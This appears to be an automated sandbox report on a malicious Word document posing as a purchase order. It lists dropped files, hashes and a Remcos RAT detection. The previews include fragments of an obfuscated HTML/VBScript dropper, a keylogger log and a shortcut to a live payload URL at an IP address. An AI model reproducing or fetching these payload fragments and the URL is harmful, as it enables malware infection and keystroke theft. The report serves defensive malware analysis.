                                                                                                                                                                        Size (bytes):3072
                                                                                                                                                                        Entropy (8bit):2.844053212743285
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:6Bskr+lUtvCUUC1OfJ7VBbCZX1ulmYa3ZXq:qiGaXdNCeXK
                                                                                                                                                                        MD5:DF07BB54198A397D0F678012983B44BC
                                                                                                                                                                        SHA1:E771DD1E45E34973D82C7A9FBF5EF33A9C7F2CEB
                                                                                                                                                                        SHA-256:AFB44ABB667604D9618738EF4861C6F501CBBB5327F4262DBE2231C277AC3D10
                                                                                                                                                                        SHA-512:E903A40DE2B38CAF9B6FB15958377C0148B99155FB967EE87FAF5736507B52A9DBF409BD889054FFF25CD5969EF85A0BF178CBEF5FFB48540039945C3019DD4B
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....{.....{.......................................... 9.....P ......K.........Q.....Y.....a.....h.....r...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.j0
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):864
                                                                                                                                                                        Entropy (8bit):5.371204427022579
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:Aqd3ka6KzvEoCKaMD5DqBVKVrdFAMBJTH:Aika60vEoCKdDcVKdBJj
                                                                                                                                                                        MD5:1311699947C9EF1E5793A231175094B2
                                                                                                                                                                        SHA1:FF1DC82FBB8C8C3BA93752613ED4064ABB5FC233
                                                                                                                                                                        SHA-256:A6F2447301FF4BD58D97C307C81FE6721EE42D2FC07C693F9D16B15B2F5B676A
                                                                                                                                                                        SHA-512:57CC2F5FCF392A8FBD798045F6875C7ADDCFF6F6D35C3D6ED720B5FFFC2C0593A4CAD2AC8C47742F5E3C05C84B681E068FD4B766E5D77738AB0CE4D1C2EB758E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                        Entropy (8bit):3.553171697638741
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:6ljnOugl55YcIeeDAlANOaplQlmHSNombQOfxNa/WA7DxbN2fBMMm0v:6ltgDecqNOilLyp50/WItN25MMl
                                                                                                                                                                        MD5:108AB0025FAF6B85E61C5AF2BA2B4633
                                                                                                                                                                        SHA1:8ED1B3241CEF667725DA71177AF3F723E5E38E9D
                                                                                                                                                                        SHA-256:5420EF90BC31A7DC3E69A7FE800299C6D05EF7F2648DAF18B5B9F1D7441D10A4
                                                                                                                                                                        SHA-512:FE158C87BF6E728B1B6F97528E31A1E85A93719D2BE3600BF8941CD5B6E2912EA07D11A3B0C7100CAA291F8F4C056A95A21EB3850650D44A7CD7D867D9E4EDFC
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, Author: Joe Security
                                                                                                                                                                        Preview:....[.2.0.2.4./.1.0./.2.3. .1.1.:.2.7.:.2.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0...d.o.c.x. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                        Entropy (8bit):0.025568139522252297
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:I3DPc4CavqvxggLRHSigdtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPRkLiRvYg3J/
                                                                                                                                                                        MD5:2DF6C5CCA2DE2FDD8DB8169313A807B2
                                                                                                                                                                        SHA1:02509CAAD465A111DB7AFA01C0D4842FDE8456BF
                                                                                                                                                                        SHA-256:8610B56CE4AE8553280D8195BE22BD30084EFB106743484239B2E1594B895750
                                                                                                                                                                        SHA-512:DA59566C2996FC5E2FE8C00659E88E75B42C054A4239E4A6A93A5222773D2B2322DC7E66983EC25D740C78EF594F94249C41998C5FDA94D455A9676283BDC1DA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:......M.eFy...z...p../@..%?....S,...X.F...Fa.q.............................P.G"..B....=.`............/t..B.....|W@.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                        Entropy (8bit):0.025593217010028504
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:I3DPc3FvxggLR1bgvIqg/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPyJ9qGvYg3J/
                                                                                                                                                                        MD5:C4C34027D6BD02D908AC1B9AA9B58905
                                                                                                                                                                        SHA1:F53802BD01593E9055166DFCD19BD263FE1F6E57
                                                                                                                                                                        SHA-256:B10F7148DB75CFCC8D7F701FC0C8CD3AC9A574B1078591E25DC37C5772B955BA
                                                                                                                                                                        SHA-512:66B01FCB68C96C1B0F6E9FFF3E7309F6D2B3531B1869B585820297EAABE4E40D8DF7C3799137ADA7468DD5DFB76E96D95A53F3E4B7230B72D0F27800611128C1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:......M.eFy...z:.W..o.N.t..FH..S,...X.F...Fa.q............................".9.!.<G...............>.y.mD.X.k.L.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Wed Oct 23 14:26:05 2024, length=711761, window=hide
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1084
                                                                                                                                                                        Entropy (8bit):4.544829197222997
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:8bDah460gXg/XAlCPCHaXPqzBdB/5YXX+WBWcYIhNOilQicvbuflNOil+DtZ3YiX:8bDa6/XTizv4Xnj4iBeU4igDv3q6i57u
                                                                                                                                                                        MD5:DAA43B262800C03F9BF99DD6A62FE9CD
                                                                                                                                                                        SHA1:08D5504D8A30F877AD376AF38CEE98C505203088
                                                                                                                                                                        SHA-256:95806EFC73AA97D4FF8FC43BD66A964BAAE389D7467F4C9461A7BF66AEA9E711
                                                                                                                                                                        SHA-512:8520919F37F658EFA4C3F90DDBA41BA86FC8D84B03C32A665DF830A77CD5DFBEF8A356E618344DE1D86BA7E07741052B424B3E000B702F5913327A1B63DB3F4B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:L..................F.... ....w..r....w..r....3.._%..Q............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....WYA{..user.8......QK.XWYA{*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.Q...WYC{ .PONAHK~1.DOC..f.......WE..WE.*.........................P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\PO NAHK22012FA00000.docx.doc.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Generic INItialization configuration [doc]
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):109
                                                                                                                                                                        Entropy (8bit):4.661552132641317
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:bDZwbQL3Ru0/ZLFSmX1gRk0/ZLFSv:bK0bRu0/ZLFqRk0/ZLFc
                                                                                                                                                                        MD5:34D97D9BD9E741DCCC928E4069C53B22
                                                                                                                                                                        SHA1:8EA369C201E19E09BD83679B6233DF29B0EF5E9F
                                                                                                                                                                        SHA-256:5E3F338289E16C8798CAEFC8337EFDA6C51A50884BDBAACB15738FAB4FA91F67
                                                                                                                                                                        SHA-512:010E2333C279AAEC58793AAEF53F9CFD26BF906BBEC3FCED8EFAB9E148BA92BAEB92243F62528BFFA6E47D11A6188C7456C948EF33A5B80CB3E06649C1A98FB5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[folders]..wg on 85.215.206.82.url=0..PO NAHK22012FA00000.docx.LNK=0..[doc]..PO NAHK22012FA00000.docx.LNK=0..
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://85.215.206.82/270/weg/wg/>), ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):58
                                                                                                                                                                        Entropy (8bit):4.67644090869687
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:HRAbABGQYm/SXUkSmKzJSY:HRYFVm/kUkS9FB
                                                                                                                                                                        MD5:B4311F9003A4E484101F1987676D1D76
                                                                                                                                                                        SHA1:72E83BBD71485A8975EC8F54F64E948CB4E323AB
                                                                                                                                                                        SHA-256:204DD6864887232AB9626BBDB3C029E72A508C8A2500A3BC3E41CC58EAEA890A
                                                                                                                                                                        SHA-512:362969C8223D4BFC9B5F14331357A6885054E04C0A766C70CCA567B0D0688BEA2953BDF77BD277F10ABB95F6E2C985413478647267BF601EA2DC4BE453973E1F
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:[InternetShortcut]..URL=http://85.215.206.82/270/weg/wg/..
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                        Entropy (8bit):2.4797606462020307
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):140662
                                                                                                                                                                        Entropy (8bit):3.687456635992758
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:kSb7gt5pWGwiAON6gpvRwd07c3v9TVyr2HUDH:zKRRwd0eVTY2CH
                                                                                                                                                                        MD5:E9D4662595A294AA122FB25CB9596E64
                                                                                                                                                                        SHA1:62F49FFD85F901F68EEB23A3DE78D3A19E28D0F6
                                                                                                                                                                        SHA-256:99D2EF08D3101CDFD89AFEA909815A7448200A7175A85D13C19B29DB084C7DD1
                                                                                                                                                                        SHA-512:CD164953B1DDD6416611DB863F61B0FE69C5AA4271B033E5E72118F31D2FBD2E0440CFB37137768185D85692B56F11B7433212B1B858C248692CA13C163C6D1F
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.v.i.n.a.g.r.a.r.)..... . . . .d.i.m. .c.a.r.n.i.s.t.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .c.a.r.n.i.s.t.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .c.a.r.n.i.s.t.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.
                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):133688
                                                                                                                                                                        Entropy (8bit):2.5311599425492504
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:Eam7X/Ot9CLGFNOt9CaIGcHFX6k6m46FHHO7HxOt9CZ4Ot9CiimAb5WGwONOt9CH:Ea2Xmt4+Et4jlXPRt47t4SGEt4TT
                                                                                                                                                                        MD5:02B4AB021D0F800EC41B06E11B8DA4AC
                                                                                                                                                                        SHA1:767D0E4DDDF988CA60A9C1DFDA19B7CFC0D56B47
                                                                                                                                                                        SHA-256:137502965371FE3D3DADD7C0BF9EB27103DCFD391E7676F322022F2C46DB9084
                                                                                                                                                                        SHA-512:6F79B586DEE5CB23D152E31941CBA571C27F4C905C74F2E04BF534315D74132CDA92FBD2960367AFAF9936F7E7C68C3166C94BCEBD3F8C4B9783480F9A4B0A5A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscrIpT%252520laNGuAge%25253D%252522VbscRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):825645
                                                                                                                                                                        Entropy (8bit):7.9920885509455575
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:24576:dOe8OEfRkETfsIgLmGqvo+IPIrRE76UpYb5h:dOexi1gLLqvol+225h
                                                                                                                                                                        MD5:1F118B82BDF2ECFBDB48A0F8932D626D
                                                                                                                                                                        SHA1:25561C15F33F67BD0C5A21CB5FC6628598777C4C
                                                                                                                                                                        SHA-256:1FE3589CF5A0D9981DBC24BF1BC51DDEFF491462C86243A5362B45EB31FD7669
                                                                                                                                                                        SHA-512:ED4C4D34A3180A48B7FA85D8F9174404F0AED6ED916D42509C8B196B0B8FE95602C66F302AE0C36146E2923F9A79D55DA20584D5AB5B303868EE319AA49EF1AD
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:PK..........!.e.......*.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VKo.0.....0t.l.-0.C...8...agE.c.....&.~T..]..........AR ..+.d...v.dg.e`.S..K.s~..cYDa.h....!....O...C.(....;.Q.`D,..K'..F ..%.B>.%....+.."X.1a....*..`v......,.j.KT%..7Z.$...=..U....|2.].....A"....T{..$}.<........Q[..En..Z...Rs.!..w....r.. {................#..i....mw...n .'W.........*.!JL..x.......!$._....'.q..+...?FS...WH..Z.c.....V..a..+... .........?.?.k..-p........o.t...........\,.8}.:..&@.E.o.....(iB>.
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                        Entropy (8bit):2.4797606462020307
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):825645
                                                                                                                                                                        Entropy (8bit):7.9920885509455575
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:24576:dOe8OEfRkETfsIgLmGqvo+IPIrRE76UpYb5h:dOexi1gLLqvol+225h
                                                                                                                                                                        MD5:1F118B82BDF2ECFBDB48A0F8932D626D
                                                                                                                                                                        SHA1:25561C15F33F67BD0C5A21CB5FC6628598777C4C
                                                                                                                                                                        SHA-256:1FE3589CF5A0D9981DBC24BF1BC51DDEFF491462C86243A5362B45EB31FD7669
                                                                                                                                                                        SHA-512:ED4C4D34A3180A48B7FA85D8F9174404F0AED6ED916D42509C8B196B0B8FE95602C66F302AE0C36146E2923F9A79D55DA20584D5AB5B303868EE319AA49EF1AD
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:PK..........!.e.......*.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VKo.0.....0t.l.-0.C...8...agE.c.....&.~T..]..........AR ..+.d...v.dg.e`.S..K.s~..cYDa.h....!....O...C.(....;.Q.`D,..K'..F ..%.B>.%....+.."X.1a....*..`v......,.j.KT%..7Z.$...=..U....|2.].....A"....T{..$}.<........Q[..En..Z...Rs.!..w....r.. {................#..i....mw...n .'W.........*.!JL..x.......!$._....'.q..+...?FS...WH..Z.c.....V..a..+... .........?.?.k..-p........o.t...........\,.8}.:..&@.E.o.....(iB>.
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                        File type:Microsoft Word 2007+
                                                                                                                                                                        Entropy (8bit):7.988999439714533
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                                                                        • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                                                                        • ZIP compressed archive (8000/1) 9.41%
                                                                                                                                                                        File name:PO NAHK22012FA00000.docx.doc
                                                                                                                                                                        File size:711'761 bytes
                                                                                                                                                                        MD5:a4633b398a95e20e7ec12dcaf3090e43
                                                                                                                                                                        SHA1:06b1ecd43566ad5aaa16986c0bccaf5c1561a31b
                                                                                                                                                                        SHA256:e3c8080fba2dae8436582c23e49387b29f15dab713779d2d0f16a9d3ec022f3d
                                                                                                                                                                        SHA512:dd640250a82e34bcfe687153b29d61daf5745df79a42c9bb88b8542fc289be4d509f91eade9afd0e51a1ab061ca76664504a264f5a878efdd67534a365f7ec54
                                                                                                                                                                        SSDEEP:12288:hNv8Ze3RcgmpPwerHcQ8IscgVeyMDF0aEDgOXNXpcwJvC4p4pbw3ukb80:nCe3RCVLcQ8IscgVBKvEccvscV
                                                                                                                                                                        TLSH:1FE423D6378F5CB1C9BA215E85B928FE16BB24A06BF11FCF353072551A7A4F80440DD6
